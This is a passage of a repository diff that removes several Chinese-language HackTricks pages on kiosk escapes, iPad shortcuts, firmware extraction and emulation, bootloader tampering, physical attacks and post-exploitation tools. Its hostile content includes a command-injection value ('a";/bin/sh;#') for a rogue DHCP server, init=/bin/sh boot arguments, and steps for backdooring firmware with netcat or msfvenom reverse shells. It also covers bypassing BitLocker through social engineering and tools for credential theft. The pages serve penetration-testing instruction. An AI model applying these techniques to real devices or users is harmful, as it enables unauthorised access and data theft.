- 从底部向上滑动以在全屏应用程序中显示任务栏。
## Internet Explorer 技巧
### '图像工具栏'
这是一个在单击图像时出现在左上角的工具栏。您将能够保存、打印、发送邮件、在资源管理器中打开“我的图片”。Kiosk 需要使用 Internet Explorer。
### Shell 协议
输入这些 URL 以获取资源管理器视图:
- `shell:Administrative Tools`
- `shell:DocumentsLibrary`
- `shell:Libraries`
- `shell:UserProfiles`
- `shell:Personal`
- `shell:SearchHomeFolder`
- `shell:NetworkPlacesFolder`
- `shell:SendTo`
- `shell:UserProfiles`
- `shell:Common Administrative Tools`
- `shell:MyComputerFolder`
- `shell:InternetFolder`
- `Shell:Profile`
- `Shell:ProgramFiles`
- `Shell:System`
- `Shell:ControlPanelFolder`
- `Shell:Windows`
- `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> 控制面板
- `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> 我的电脑
- `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> 我的网络位置
- `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
## 显示文件扩展名
请查看此页面以获取更多信息:[https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
# 浏览器技巧
备份 iKat 版本:
[http://swin.es/k/](http://swin.es/k/)\
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
使用 JavaScript 创建一个通用对话框并访问文件资源管理器:`document.write('<input/type=file>')`
来源https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
# iPad
## 手势和按钮
- 用四个(或五个)手指向上滑动 / 双击主屏幕按钮:查看多任务视图并更改应用程序
- 用四个或五个手指向一个方向滑动:以更改到下一个/上一个应用程序
- 用五个手指捏合屏幕 / 按下主屏幕按钮 / 用一根手指快速从屏幕底部向上滑动:访问主屏幕
- 用一根手指从屏幕底部滑动 1-2 英寸(慢):停靠栏将出现
- 用一根手指从显示器顶部向下滑动:查看通知
- 用一根手指从屏幕右上角向下滑动:查看 iPad Pro 的控制中心
- 用一根手指从屏幕左侧滑动 1-2 英寸:查看今日视图
- 用一根手指快速从屏幕中心向右或向左滑动:更改到下一个/上一个应用程序
- 按住右上角的开/关/睡眠按钮 + 将滑块移动到右侧以**关闭电源**:关闭电源
- 按住右上角的开/关/睡眠按钮和主屏幕按钮几秒钟:强制硬关机
- 快速按右上角的开/关/睡眠按钮和主屏幕按钮:截屏,截屏将弹出在显示器的左下角。两者同时按下非常短暂,如果按住几秒钟将执行硬关机。
## 快捷键
您应该有一个 iPad 键盘或 USB 键盘适配器。这里只显示可能帮助您逃离应用程序的快捷键。
| Key | Name |
| --- | ------------ |
| ⌘ | Command |
| ⌥ | Option (Alt) |
| ⇧ | Shift |
| ↩ | Return |
| ⇥ | Tab |
| ^ | Control |
| ← | Left Arrow |
| → | Right Arrow |
| ↑ | Up Arrow |
| ↓ | Down Arrow |
### 系统快捷键
这些快捷键用于视觉设置和声音设置,具体取决于 iPad 的使用。
| Shortcut | Action |
| -------- | ------------------------------------------------------------------------------ |
| F1 | 调暗屏幕 |
| F2 | 提亮屏幕 |
| F7 | 返回一首歌曲 |
| F8 | 播放/暂停 |
| F9 | 跳过歌曲 |
| F10 | 静音 |
| F11 | 降低音量 |
| F12 | 增加音量 |
| ⌘ Space | 显示可用语言列表;要选择一种,请再次按空格键。 |
### iPad 导航
| Shortcut | Action |
| -------------------------------------------------- | ------------------------------------------------------- |
| ⌘H | 返回主屏幕 |
| ⌘⇧H (Command-Shift-H) | 返回主屏幕 |
| ⌘ (Space) | 打开 Spotlight |
| ⌘⇥ (Command-Tab) | 列出最近使用的十个应用程序 |
| ⌘\~ | 返回上一个应用程序 |
| ⌘⇧3 (Command-Shift-3) | 截屏(悬停在左下角以保存或操作) |
| ⌘⇧4 | 截屏并在编辑器中打开 |
| 按住 ⌘ | 列出可用于该应用程序的快捷键 |
| ⌘⌥D (Command-Option/Alt-D) | 显示停靠栏 |
| ^⌥H (Control-Option-H) | 主屏幕按钮 |
| ^⌥H H (Control-Option-H-H) | 显示多任务栏 |
| ^⌥I (Control-Option-i) | 项目选择器 |
| Escape | 返回按钮 |
| → (右箭头) | 下一个项目 |
| ← (左箭头) | 上一个项目 |
| ↑↓ (上箭头, 下箭头) | 同时点击选定的项目 |
| ⌥ ↓ (Option-Down arrow) | 向下滚动 |
| ⌥↑ (Option-Up arrow) | 向上滚动 |
| ⌥← 或 ⌥→ (Option-Left arrow 或 Option-Right arrow) | 向左或向右滚动 |
| ^⌥S (Control-Option-S) | 开启或关闭 VoiceOver 语音 |
| ⌘⇧⇥ (Command-Shift-Tab) | 切换到上一个应用程序 |
| ⌘⇥ (Command-Tab) | 切换回原始应用程序 |
| ←+→,然后 Option + ← 或 Option+→ | 在停靠栏中导航 |
### Safari 快捷键
| Shortcut | Action |
| ----------------------- | ------------------------------------------------ |
| ⌘L (Command-L) | 打开位置 |
| ⌘T | 打开新标签 |
| ⌘W | 关闭当前标签 |
| ⌘R | 刷新当前标签 |
| ⌘. | 停止加载当前标签 |
| ^⇥ | 切换到下一个标签 |
| ^⇧⇥ (Control-Shift-Tab) | 移动到上一个标签 |
| ⌘L | 选择文本输入/URL 字段以进行修改 |
| ⌘⇧T (Command-Shift-T) | 打开最后关闭的标签(可以多次使用) |
| ⌘\[ | 在浏览历史中返回一页 |
| ⌘] | 在浏览历史中前进一页 |
| ⌘⇧R | 激活阅读模式 |
### 邮件快捷键
| Shortcut | Action |
| -------------------------- | ---------------------------- |
| ⌘L | 打开位置 |
| ⌘T | 打开新标签 |
| ⌘W | 关闭当前标签 |
| ⌘R | 刷新当前标签 |
| ⌘. | 停止加载当前标签 |
| ⌘⌥F (Command-Option/Alt-F) | 在您的邮箱中搜索 |
# 参考文献
- [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
- [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
- [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/)
- [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
{{#include ../../banners/hacktricks-training.md}}

240
src/physical-attacks/firmware-analysis/README.md
View File

@ -1,240 +0,0 @@
# 固件分析
{{#include ../../banners/hacktricks-training.md}}
## **介绍**
固件是使设备正常运行的基本软件,通过管理和促进硬件组件与用户交互的软件之间的通信。它存储在永久内存中,确保设备在开机时能够访问重要指令,从而启动操作系统。检查和可能修改固件是识别安全漏洞的关键步骤。
## **收集信息**
**收集信息**是理解设备构成和所用技术的关键初步步骤。此过程涉及收集以下数据:
- CPU架构和运行的操作系统
- 引导加载程序的具体信息
- 硬件布局和数据表
- 代码库指标和源位置
- 外部库和许可证类型
- 更新历史和监管认证
- 架构和流程图
- 安全评估和已识别的漏洞
为此,**开源情报OSINT**工具是不可或缺的,分析任何可用的开源软件组件通过手动和自动审查过程也同样重要。像[Coverity Scan](https://scan.coverity.com)和[Semmles LGTM](https://lgtm.com/#explore)这样的工具提供免费的静态分析,可以用来发现潜在问题。
## **获取固件**
获取固件可以通过多种方式进行,每种方式的复杂程度不同:
- **直接**从源头(开发者、制造商)
- **根据**提供的说明进行**构建**
- **从**官方支持网站**下载**
- 利用**Google dork**查询查找托管的固件文件
- 直接访问**云存储**,使用像[S3Scanner](https://github.com/sa7mon/S3Scanner)这样的工具
- 通过中间人技术**拦截**更新
- 通过**UART**、**JTAG**或**PICit**等连接**提取**设备中的固件
- 在设备通信中**嗅探**更新请求
- 识别并使用**硬编码的更新端点**
- 从引导加载程序或网络**转储**
- 在万不得已时,**拆卸并读取**存储芯片,使用适当的硬件工具
## 分析固件
现在你**拥有固件**,你需要提取有关它的信息,以了解如何处理它。你可以使用的不同工具有:
```bash
file <bin>
strings -n8 <bin>
strings -tx <bin> #print offsets in hex
hexdump -C -n 512 <bin> > hexdump.out
hexdump -C <bin> | head # might find signatures in header
fdisk -lu <bin> #lists a drives partition and filesystems if multiple
```
如果你使用这些工具没有找到太多信息,可以使用 `binwalk -E <bin>` 检查图像的 **entropy**,如果熵低,那么它不太可能被加密。如果熵高,则可能被加密(或以某种方式压缩)。
此外,你可以使用这些工具提取 **嵌入固件中的文件**
{{#ref}}
../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
{{#endref}}
或者 [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) 来检查文件。
### 获取文件系统
使用之前提到的工具,如 `binwalk -ev <bin>`,你应该能够 **提取文件系统**。\
Binwalk 通常会将其提取到一个 **以文件系统类型命名的文件夹**通常是以下之一squashfs、ubifs、romfs、rootfs、jffs2、yaffs2、cramfs、initramfs。
#### 手动文件系统提取
有时binwalk **在其签名中没有文件系统的魔术字节**。在这些情况下,使用 binwalk **查找文件系统的偏移量并从二进制文件中切割压缩的文件系统**,并根据其类型使用以下步骤 **手动提取** 文件系统。
```
$ binwalk DIR850L_REVB.bin
DECIMAL HEXADECIMAL DESCRIPTION
----------------------------------------------------------------------------- ---
0 0x0 DLOB firmware header, boot partition: """"dev=/dev/mtdblock/1""""
10380 0x288C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5213748 bytes
1704052 0x1A0074 PackImg section delimiter tag, little endian size: 32256 bytes; big endian size: 8257536 bytes
1704084 0x1A0094 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8256900 bytes, 2688 inodes, blocksize: 131072 bytes, created: 2016-07-12 02:28:41
```
运行以下 **dd 命令** 切割 Squashfs 文件系统。
```
$ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
8257536+0 records in
8257536+0 records out
8257536 bytes (8.3 MB, 7.9 MiB) copied, 12.5777 s, 657 kB/s
```
另外,可以运行以下命令。
`$ dd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs`
- 对于 squashfs在上面的示例中使用
`$ unsquashfs dir.squashfs`
文件将随后位于 "`squashfs-root`" 目录中。
- CPIO 存档文件
`$ cpio -ivd --no-absolute-filenames -F <bin>`
- 对于 jffs2 文件系统
`$ jefferson rootfsfile.jffs2`
- 对于带 NAND 闪存的 ubifs 文件系统
`$ ubireader_extract_images -u UBI -s <start_offset> <bin>`
`$ ubidump.py <bin>`
## 分析固件
一旦获得固件,拆解它以理解其结构和潜在漏洞是至关重要的。此过程涉及利用各种工具分析和提取固件映像中的有价值数据。
### 初步分析工具
提供了一组命令用于对二进制文件(称为 `<bin>`)进行初步检查。这些命令有助于识别文件类型、提取字符串、分析二进制数据以及理解分区和文件系统的细节:
```bash
file <bin>
strings -n8 <bin>
strings -tx <bin> #prints offsets in hexadecimal
hexdump -C -n 512 <bin> > hexdump.out
hexdump -C <bin> | head #useful for finding signatures in the header
fdisk -lu <bin> #lists partitions and filesystems, if there are multiple
```
为了评估图像的加密状态,使用 `binwalk -E <bin>` 检查 **entropy**。低熵表明缺乏加密,而高熵则表示可能存在加密或压缩。
对于提取 **embedded files**,推荐使用 **file-data-carving-recovery-tools** 文档和 **binvis.io** 进行文件检查的工具和资源。
### 提取文件系统
使用 `binwalk -ev <bin>`通常可以提取文件系统通常提取到一个以文件系统类型命名的目录中例如squashfsubifs。然而**binwalk** 由于缺少魔术字节而无法识别文件系统类型时,需要手动提取。这涉及使用 `binwalk` 定位文件系统的偏移量,然后使用 `dd` 命令提取文件系统:
```bash
$ binwalk DIR850L_REVB.bin
$ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
```
之后根据文件系统类型例如squashfs、cpio、jffs2、ubifs使用不同的命令手动提取内容。
### 文件系统分析
提取文件系统后开始寻找安全漏洞。关注不安全的网络守护进程、硬编码的凭据、API 端点、更新服务器功能、未编译的代码、启动脚本和编译的二进制文件以进行离线分析。
**关键位置**和**项目**检查包括:
- **etc/shadow****etc/passwd** 中的用户凭据
- **etc/ssl** 中的 SSL 证书和密钥
- 配置和脚本文件中的潜在漏洞
- 嵌入的二进制文件以进行进一步分析
- 常见 IoT 设备的网络服务器和二进制文件
几个工具有助于揭示文件系统中的敏感信息和漏洞:
- [**LinPEAS**](https://github.com/carlospolop/PEASS-ng) 和 [**Firmwalker**](https://github.com/craigz28/firmwalker) 用于敏感信息搜索
- [**固件分析和比较工具 (FACT)**](https://github.com/fkie-cad/FACT_core) 用于全面的固件分析
- [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer)、[**ByteSweep**](https://gitlab.com/bytesweep/bytesweep)、[**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go) 和 [**EMBA**](https://github.com/e-m-b-a/emba) 用于静态和动态分析
### 对编译二进制文件的安全检查
必须仔细检查文件系统中发现的源代码和编译的二进制文件以寻找漏洞。像 **checksec.sh** 这样的工具用于 Unix 二进制文件,**PESecurity** 用于 Windows 二进制文件,帮助识别可能被利用的未保护二进制文件。
## 模拟固件进行动态分析
模拟固件的过程使得可以对设备的操作或单个程序进行**动态分析**。这种方法可能会遇到硬件或架构依赖性的问题,但将根文件系统或特定二进制文件转移到具有匹配架构和字节序的设备(例如 Raspberry Pi或预构建的虚拟机上可以促进进一步的测试。
### 模拟单个二进制文件
检查单个程序时,识别程序的字节序和 CPU 架构至关重要。
#### MIPS 架构示例
要模拟 MIPS 架构的二进制文件,可以使用以下命令:
```bash
file ./squashfs-root/bin/busybox
```
并安装必要的仿真工具:
```bash
sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
```
对于 MIPS大端使用 `qemu-mips`,而对于小端二进制文件,选择 `qemu-mipsel`
#### ARM 架构仿真
对于 ARM 二进制文件,过程类似,使用 `qemu-arm` 模拟器进行仿真。
### 完整系统仿真
像 [Firmadyne](https://github.com/firmadyne/firmadyne)、[Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit) 等工具,促进完整固件仿真,自动化过程并帮助动态分析。
## 实践中的动态分析
在这个阶段,使用真实或仿真的设备环境进行分析。保持对操作系统和文件系统的 shell 访问是至关重要的。仿真可能无法完美模拟硬件交互,因此需要偶尔重新启动仿真。分析应重新访问文件系统,利用暴露的网页和网络服务,并探索引导加载程序漏洞。固件完整性测试对于识别潜在后门漏洞至关重要。
## 运行时分析技术
运行时分析涉及在其操作环境中与进程或二进制文件交互,使用工具如 gdb-multiarch、Frida 和 Ghidra 设置断点,并通过模糊测试和其他技术识别漏洞。
## 二进制利用和概念验证
为识别的漏洞开发 PoC 需要对目标架构和低级语言编程有深入理解。嵌入式系统中的二进制运行时保护很少但在存在时可能需要使用如返回导向编程ROP等技术。
## 准备好的操作系统用于固件分析
像 [AttifyOS](https://github.com/adi0x90/attifyos) 和 [EmbedOS](https://github.com/scriptingxss/EmbedOS) 这样的操作系统提供预配置的固件安全测试环境,配备必要的工具。
## 准备好的操作系统用于分析固件
- [**AttifyOS**](https://github.com/adi0x90/attifyos)AttifyOS 是一个旨在帮助您对物联网IoT设备进行安全评估和渗透测试的发行版。它通过提供一个预配置的环境加载所有必要的工具为您节省了大量时间。
- [**EmbedOS**](https://github.com/scriptingxss/EmbedOS):基于 Ubuntu 18.04 的嵌入式安全测试操作系统,预装固件安全测试工具。
## 漏洞固件练习
要练习发现固件中的漏洞,可以使用以下漏洞固件项目作为起点。
- OWASP IoTGoat
- [https://github.com/OWASP/IoTGoat](https://github.com/OWASP/IoTGoat)
- Damn Vulnerable Router Firmware Project
- [https://github.com/praetorian-code/DVRF](https://github.com/praetorian-code/DVRF)
- Damn Vulnerable ARM Router (DVAR)
- [https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html](https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html)
- ARM-X
- [https://github.com/therealsaumil/armx#downloads](https://github.com/therealsaumil/armx#downloads)
- Azeria Labs VM 2.0
- [https://azeria-labs.com/lab-vm-2-0/](https://azeria-labs.com/lab-vm-2-0/)
- Damn Vulnerable IoT Device (DVID)
- [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID)
## 参考文献
- [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904)
## 培训和认证
- [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation)
{{#include ../../banners/hacktricks-training.md}}

52
src/physical-attacks/firmware-analysis/bootloader-testing.md
View File

@ -1,52 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
以下步骤建议用于修改设备启动配置和引导加载程序,如 U-boot
1. **访问引导加载程序的解释器 Shell**
- 在启动期间,按 "0"、空格或其他识别的 "魔法代码" 以访问引导加载程序的解释器 Shell。
2. **修改引导参数**
- 执行以下命令将 '`init=/bin/sh`' 附加到引导参数中,以允许执行 Shell 命令:
%%%
#printenv
#setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh
#saveenv
#boot
%%%
3. **设置 TFTP 服务器**
- 配置 TFTP 服务器以通过本地网络加载映像:
%%%
#setenv ipaddr 192.168.2.2 #设备的本地 IP
#setenv serverip 192.168.2.1 #TFTP 服务器 IP
#saveenv
#reset
#ping 192.168.2.1 #检查网络访问
#tftp ${loadaddr} uImage-3.6.35 #loadaddr 是加载文件的地址uImage-3.6.35 是 TFTP 服务器上的映像文件名
%%%
4. **利用 `ubootwrite.py`**
- 使用 `ubootwrite.py` 写入 U-boot 映像并推送修改后的固件以获得 root 访问权限。
5. **检查调试功能**
- 验证是否启用了调试功能,如详细日志记录、加载任意内核或从不受信任的来源启动。
6. **谨慎的硬件干扰**
- 在设备启动序列期间,特别是在内核解压缩之前,连接一个引脚到地并与 SPI 或 NAND 闪存芯片交互时要小心。在短接引脚之前,请查阅 NAND 闪存芯片的数据手册。
7. **配置恶意 DHCP 服务器**
- 设置一个恶意 DHCP 服务器,使用恶意参数供设备在 PXE 启动期间获取。利用 Metasploit 的 (MSF) DHCP 辅助服务器等工具。修改 'FILENAME' 参数,使用命令注入命令,如 `'a";/bin/sh;#'` 来测试设备启动程序的输入验证。
**注意**:涉及与设备引脚物理交互的步骤(\*用星号标记)应极其谨慎,以避免损坏设备。
## 参考文献
- [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
{{#include ../../banners/hacktricks-training.md}}

35
src/physical-attacks/firmware-analysis/firmware-integrity.md
View File

@ -1,35 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
## 固件完整性
**自定义固件和/或编译的二进制文件可以被上传以利用完整性或签名验证缺陷**。可以按照以下步骤进行后门绑定 shell 编译:
1. 可以使用 firmware-mod-kit (FMK) 提取固件。
2. 应识别目标固件的架构和字节序。
3. 可以使用 Buildroot 或其他适合环境的方法构建交叉编译器。
4. 可以使用交叉编译器构建后门。
5. 可以将后门复制到提取的固件 /usr/bin 目录。
6. 可以将适当的 QEMU 二进制文件复制到提取的固件 rootfs。
7. 可以使用 chroot 和 QEMU 模拟后门。
8. 可以通过 netcat 访问后门。
9. 应从提取的固件 rootfs 中删除 QEMU 二进制文件。
10. 可以使用 FMK 重新打包修改后的固件。
11. 可以通过使用固件分析工具包 (FAT) 模拟后门固件,并使用 netcat 连接到目标后门 IP 和端口来测试后门固件。
如果已经通过动态分析、引导加载程序操作或硬件安全测试获得了 root shell可以执行预编译的恶意二进制文件如植入物或反向 shell。可以使用以下步骤利用自动化有效载荷/植入工具,如 Metasploit 框架和 'msfvenom'
1. 应识别目标固件的架构和字节序。
2. 可以使用 msfvenom 指定目标有效载荷、攻击者主机 IP、监听端口号、文件类型、架构、平台和输出文件。
3. 可以将有效载荷传输到被攻陷的设备,并确保其具有执行权限。
4. 可以通过启动 msfconsole 并根据有效载荷配置设置来准备 Metasploit 处理传入请求。
5. 可以在被攻陷的设备上执行 meterpreter 反向 shell。
6. 可以监控 meterpreter 会话的开启情况。
7. 可以执行后渗透活动。
如果可能,可以利用启动脚本中的漏洞以在重启后获得对设备的持久访问。这些漏洞在启动脚本引用、[符号链接](https://www.chromium.org/chromium-os/chromiumos-design-docs/hardening-against-malicious-stateful-data)或依赖于位于不受信任的挂载位置(如用于存储根文件系统外数据的 SD 卡和闪存卷)中的代码时出现。
## 参考文献
- 有关更多信息,请查看 [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
{{#include ../../banners/hacktricks-training.md}}

57
src/physical-attacks/physical-attacks.md
View File

@ -1,57 +0,0 @@
# 物理攻击
{{#include ../banners/hacktricks-training.md}}
## BIOS 密码恢复和系统安全
**重置 BIOS** 可以通过几种方式实现。大多数主板都包含一个 **电池**,当移除约 **30 分钟** 后,将重置 BIOS 设置,包括密码。或者,可以通过调整 **主板上的跳线** 来重置这些设置,方法是连接特定的引脚。
对于无法或不实用进行硬件调整的情况,**软件工具** 提供了解决方案。使用 **Kali Linux** 等发行版从 **Live CD/USB** 运行系统,可以访问像 **_killCmos_****_CmosPWD_** 这样的工具,帮助进行 BIOS 密码恢复。
在 BIOS 密码未知的情况下,错误输入 **三次** 通常会导致错误代码。可以在像 [https://bios-pw.org](https://bios-pw.org) 这样的网站上使用此代码来检索可用的密码。
### UEFI 安全
对于使用 **UEFI** 而非传统 BIOS 的现代系统,可以利用工具 **chipsec** 来分析和修改 UEFI 设置,包括禁用 **安全启动**。可以使用以下命令完成此操作:
`python chipsec_main.py -module exploits.secure.boot.pk`
### RAM 分析和冷启动攻击
在断电后RAM 会短暂保留数据,通常为 **1 到 2 分钟**。通过施加冷物质,如液氮,可以将这种持续时间延长至 **10 分钟**。在此延长期间,可以使用像 **dd.exe****volatility** 这样的工具创建 **内存转储** 进行分析。
### 直接内存访问 (DMA) 攻击
**INCEPTION** 是一个旨在通过 DMA 进行 **物理内存操作** 的工具,兼容 **FireWire****Thunderbolt** 等接口。它允许通过修补内存以接受任何密码来绕过登录程序。然而,它对 **Windows 10** 系统无效。
### Live CD/USB 进行系统访问
更改系统二进制文件,如 **_sethc.exe_****_Utilman.exe_**,并用 **_cmd.exe_** 的副本替换,可以提供具有系统权限的命令提示符。可以使用像 **chntpw** 这样的工具编辑 Windows 安装的 **SAM** 文件,从而允许更改密码。
**Kon-Boot** 是一个工具,可以在不知道密码的情况下登录 Windows 系统,通过临时修改 Windows 内核或 UEFI。更多信息可以在 [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/) 找到。
### 处理 Windows 安全功能
#### 启动和恢复快捷键
- **Supr**: 访问 BIOS 设置。
- **F8**: 进入恢复模式。
- 在 Windows 横幅后按 **Shift** 可以绕过自动登录。
#### BAD USB 设备
**Rubber Ducky****Teensyduino** 这样的设备作为创建 **bad USB** 设备的平台,能够在连接到目标计算机时执行预定义的有效载荷。
#### 卷影副本
管理员权限允许通过 PowerShell 创建敏感文件的副本,包括 **SAM** 文件。
### 绕过 BitLocker 加密
如果在内存转储文件 (**MEMORY.DMP**) 中找到 **恢复密码**,则可能绕过 BitLocker 加密。可以使用像 **Elcomsoft Forensic Disk Decryptor****Passware Kit Forensic** 这样的工具来实现。
### 社会工程学用于恢复密钥添加
可以通过社会工程学策略添加新的 BitLocker 恢复密钥,说服用户执行一个命令,添加一个由零组成的新恢复密钥,从而简化解密过程。
{{#include ../banners/hacktricks-training.md}}

16
src/post-exploitation.md
View File

@ -1,16 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
## **本地 l00t**
- [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): 这些脚本除了寻找 PE 向量外,还会在文件系统中查找敏感信息。
- [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne 项目**是一个开源应用程序,用于**检索存储在本地计算机上的大量密码**。每个软件使用不同的技术明文、API、自定义算法、数据库等存储其密码。该工具的开发目的是查找最常用软件的这些密码。
## **外部服务**
- [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): 此模块将使用访问令牌连接到 Confluence 的 API导出为 PDF并下载目标可以访问的 Confluence 文档。
- [**GD-Thief**](https://github.com/antman1p/GD-Thief): 红队工具,用于通过 Google Drive API 从目标的 Google Drive 中提取文件,攻击者可以访问这些文件。这包括所有共享文件、所有共享驱动器中的文件,以及目标可以访问的域驱动器中的所有文件。
- [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): 红队工具,用于通过 Google 的 People API 提取您可以访问的目标组织的 Google 人员目录。
- [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** 这是一个用 Python 开发的工具,利用原生 Slack API 从给定访问令牌的 Slack 工作区中提取“有趣”的信息。
- [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound 是一个命令行工具,供红队和蓝队快速对 Slack 工作区/组织进行侦察。Slackhound 使组织的用户、文件、消息等的收集快速可搜索,并将大型对象写入 CSV 以供离线审查。
{{#include ./banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff Show More